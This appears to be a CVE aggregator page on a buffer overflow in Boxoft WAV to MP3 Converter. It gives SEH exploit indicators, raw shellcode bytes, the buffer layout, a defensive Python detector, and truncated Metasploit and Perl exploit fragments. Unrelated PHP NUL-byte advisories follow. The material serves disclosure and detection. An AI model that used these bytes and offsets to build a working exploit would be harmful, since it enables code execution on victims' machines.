CVE-2015-7243
Published 2015-09-18
Priority: P3 (51) · Severity: high · CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
EXPLOIT · EPSS: 58.27% (99.0th percentile)
Buffer overflow in Boxoft WAV to MP3 Converter allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted WAV file.
Detection & IOCs (extracted from sources)
Bytes: \xeb\x06\x90\x90
Bytes: \x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe\x49\x0b\x31\xc0\x51\x50\xff\xd7
- Trigger condition: a crafted WAV file exceeding 4000 bytes (specifically 4132-byte padding before the SEH overwrite) causes a stack buffer overflow when converted to MP3 in Boxoft WAV to MP3 Converter.
- SEH-based exploit: look for the short-jump NOP sled pattern \xeb\x06\x90\x90 immediately followed by the P/P/R ROP gadget address 0x0040144c packed little-endian (\x4c\x14\x40\x00) within a WAV file opened by wavtomp3.exe.
- The Metasploit module drops a malicious WAV file (default name music.wav) with a null-byte bad-char constraint (\x00); monitor file-creation events for anomalously large WAV files written by non-audio applications.
- The exploit targets wavtomp3.exe version 1.1.0.0 specifically; the P/P/R gadget at 0x0040144c is only valid for that binary version, so fingerprinting the process version can confirm an exploitation attempt.
- Buffer layout: 4132 bytes of padding + 4-byte nSEH (\xeb\x06 + 2 bytes) + 4-byte SEH (ROP gadget) + shellcode + ~5860 bytes of padding. Detect WAV files with this total size profile (~10000 bytes) submitted to the converter.
- The P/P/R ROP gadget address 0x0040144c is hardcoded and specific to wavtomp3.exe version 1.1.0.0 only; the exploit will not work against version 1.0 without a different gadget address.
- The Metasploit module targets the Windows platform only and is a file-format (client-side) exploit requiring user interaction to open/convert the malicious WAV file.
- Null byte (\x00) is a bad character for the payload; any shellcode used must avoid null bytes or the exploit will fail.
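A defender-side check for the indicators listed above, written as an added example and not taken from any of the advisory sources on this page. It looks for the nSEH short-jump stub immediately followed by the little-endian gadget address, compares the match offset against the 4132-byte layout, and applies the ~10000-byte size profile. The RIFF/WAVE magic check is an extra heuristic of mine, not something the detection notes state, and both sample files are constructed inline (the "crafted" one reproduces only the layout, with inert filler where shellcode would sit).

```python
import struct

# Indicators taken from the detection notes above (CVE-2015-7243, wavtomp3.exe 1.1.0.0).
NSEH_STUB = b"\xeb\x06\x90\x90"                 # short jump over the SEH record
PPR_GADGET = struct.pack("<I", 0x0040144C)      # pop/pop/ret gadget, little-endian: 4c 14 40 00
SEH_SIGNATURE = NSEH_STUB + PPR_GADGET
PADDING_BEFORE_SEH = 4132
SEH_RECORD_LEN = 8                              # nSEH (4) + SEH (4)
TRAILING_PADDING = 5860
MIN_EXPLOIT_SIZE = PADDING_BEFORE_SEH + SEH_RECORD_LEN + TRAILING_PADDING   # 10000 bytes


def inspect_wav(data: bytes) -> dict:
    """Score an in-memory WAV file against the CVE-2015-7243 indicators.

    Returns the individual findings plus an overall 'verdict' of
    'malicious', 'suspicious' or 'clean'.
    """
    sig_offset = data.find(SEH_SIGNATURE)
    # Assumption (not from the advisory): a genuine WAV starts with a RIFF/WAVE container.
    has_riff = data[:4] == b"RIFF" and data[8:12] == b"WAVE"
    findings = {
        "size": len(data),
        "seh_signature_offset": sig_offset,             # -1 when absent
        "seh_offset_matches_layout": sig_offset == PADDING_BEFORE_SEH,
        "size_matches_profile": len(data) >= MIN_EXPLOIT_SIZE,
        "missing_riff_header": not has_riff,
    }
    if sig_offset != -1:
        # jmp-short stub directly followed by the hardcoded gadget is unambiguous
        findings["verdict"] = "malicious"
    elif findings["missing_riff_header"] and findings["size_matches_profile"]:
        # oversized blob that is not even a RIFF container: worth a closer look
        findings["verdict"] = "suspicious"
    else:
        findings["verdict"] = "clean"
    return findings


def make_benign_wav(samples: bytes = b"\x00" * 200) -> bytes:
    """Constructed minimal PCM WAV (8 kHz, mono, 16-bit) used as sample input."""
    fmt_chunk = struct.pack("<IHHIIHH", 16, 1, 1, 8000, 16000, 2, 16)
    body = b"WAVE" + b"fmt " + fmt_chunk + b"data" + struct.pack("<I", len(samples)) + samples
    return b"RIFF" + struct.pack("<I", len(body)) + body


def make_layout_sample() -> bytes:
    """Constructed test file reproducing only the buffer layout described above.

    The shellcode slot is inert filler; this is detector test data, not a payload.
    """
    shellcode_slot = b"\x42" * 16
    return (b"\x41" * PADDING_BEFORE_SEH + NSEH_STUB + PPR_GADGET
            + shellcode_slot + b"\x41" * TRAILING_PADDING)


if __name__ == "__main__":
    for name, blob in (("benign.wav", make_benign_wav()), ("crafted.wav", make_layout_sample())):
        print(name, inspect_wav(blob))
```

The size profile on its own is a poor discriminator (most real recordings are far larger than 10 KB), so the verdict only uses it together with the missing-container heuristic; the byte signature is the indicator that actually carries weight, and it also pins the gadget to wavtomp3.exe 1.1.0.0, as the notes above point out.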
CVSS provenance
NVD (CVSS v2.0): 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
Red Hat (vendor): 5.0 MEDIUM
GHSA
GHSA-7f6c-6g42-4r9g (ghsa_unreviewed · 2022-05-14): CVE-2015-7243 [HIGH] CWE-119
Buffer overflow in Boxoft WAV to MP3 Converter allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted WAV file.
Red Hat
php: pcntl_exec() accepts paths with NUL character (vendor_redhat · 2015-05-14 · CVSS 5.0): CVE-2015-4026 [MEDIUM] CWE-626
The pcntl_exec implementation in PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 truncates a pathname upon encountering a \x00 character, which might allow remote attackers to bypass intended extension restrictions and execute files with unexpected names via a crafted first argument. NOTE: this vulnerability exists because of an incomplete fix for CVE-2006-7243.
It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.
Package: php (Red Hat Enterprise Linux 5) - Will not fix
Package: php53 (Red Hat Enterprise Linux 5) - Will not fix
Red Hat
php: regressions in 5.4+ (vendor_redhat · 2015-04-10 · CVSS 5.0): CVE-2015-4025 [MEDIUM] CWE-626
PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 truncates a pathname upon encountering a \x00 character in certain situations, which allows remote attackers to bypass intended extension restrictions and access files or directories with unexpected names via a crafted argument to (1) set_include_path, (2) tempnam, (3) rmdir, or (4) readlink. NOTE: this vulnerability exists because of an incomplete fix for CVE-2006-7243.
It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.
Package: php (Red Hat Enterprise Linux 5) - Not affected
Package: php53 (Red Hat Ente
Red Hat
php: move_uploaded_file() NUL byte injection in file name (vendor_redhat · 2015-03-02 · CVSS 5.0): CVE-2015-2348 [MEDIUM] CWE-626
The move_uploaded_file implementation in ext/standard/basic_functions.c in PHP before 5.4.39, 5.5.x before 5.5.23, and 5.6.x before 5.6.7 truncates a pathname upon encountering a \x00 character, which allows remote attackers to bypass intended extension restrictions and create files with unexpected names via a crafted second argument. NOTE: this vulnerability exists because of an incomplete fix for CVE-2006-7243.
It was found that PHP move_uploaded_file() function did not properly handle file names with a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions.
Statement: This issue does not affect the current php and php53 pac
No detection rules found.
Exploit-DB
Boxoft WAV to MP3 Converter 1.1 - Buffer Overflow (Metasploit) (exploitdb · 2018-07-03): CVE-2015-7243
---
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# The class header and 'Name' key were swallowed by HTML extraction (everything from
# "<" to the next ">"); they are restored here from the standard Metasploit module layout.
class MetasploitModule < Msf::Exploit::Remote
  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Boxoft WAV to MP3 Converter v1.1 Buffer Overflow",
      'Description'    => %q{
        This module exploits a stack buffer overflow in Boxoft WAV to MP3 Converter versions 1.0 and 1.1.
        By constructing a specially crafted WAV file and attempting to convert it to an MP3 file in the
        application, a buffer is overwritten, which allows for running shellcode.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Robbie Corley', # EDB POC
          'Shelby Pace'    # Metasploit Module
        ],
      'References'     =>
        [
          [ 'CVE', '2015-7243' ],
          [ 'EDB', '38035' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'Boxoft WAV to MP3
```
Exploit-DB
Boxoft WAV to MP3 Converter - 'convert' Local Buffer Overflow (exploitdb · 2015-08-31): CVE-2015-7243
---
```perl
# Exploit Title: Boxoft wav to mp3 converter SEH bypass technique tested on Win7x64
# Date: 8-31-2015
# Software Link: http://www.boxoft.com/wav-to-mp3/
# Exploit Author: Robbie Corley
# Contact: [email protected]
# Website:
# Target: Windows 7 Enterprise x64
# CVE:
# Category: Local Exploit
#
# Description:
# A buffer overflow was found after constructing a .wav payload over 4000 characters and attempting to convert the payload to a .mp3 file

my $buff = "\x41" x 4132;          # padding up to the SEH record
#my $nseh = "\x42" x 4;
#my $seh = "\x43" x 4;
my $endofbuff = "\x41" x 5860;     # trailing padding after the shellcode
my $nseh = "\xeb\x06\x90\x90";     # jump to shellcode
my $seh = pack('V',0x0040144c);    # pop pop retn
#MessageBox Shellc0de
#https://www.exploit-db.com/exploits/28996/
my $shellcode
```
Metasploit
Boxoft WAV to MP3 Converter v1.1 Buffer Overflow (metasploit)
This module exploits a stack buffer overflow in Boxoft WAV to MP3 Converter versions 1.0 and 1.1. By constructing a specially crafted WAV file and attempting to convert it to an MP3 file in the application, a buffer is overwritten, which allows for running shellcode.
References:
- http://packetstormsecurity.com/files/133377/Boxoft-WAV-To-MP3-Converter-Buffer-Overflow.html
- http://packetstormsecurity.com/files/137277/Boxoft-Wav-To-MP3-Converter-1.0-Buffer-Overflow.html
- https://www.exploit-db.com/exploits/38035/
- https://www.exploit-db.com/exploits/44971/
Published: 2015-09-18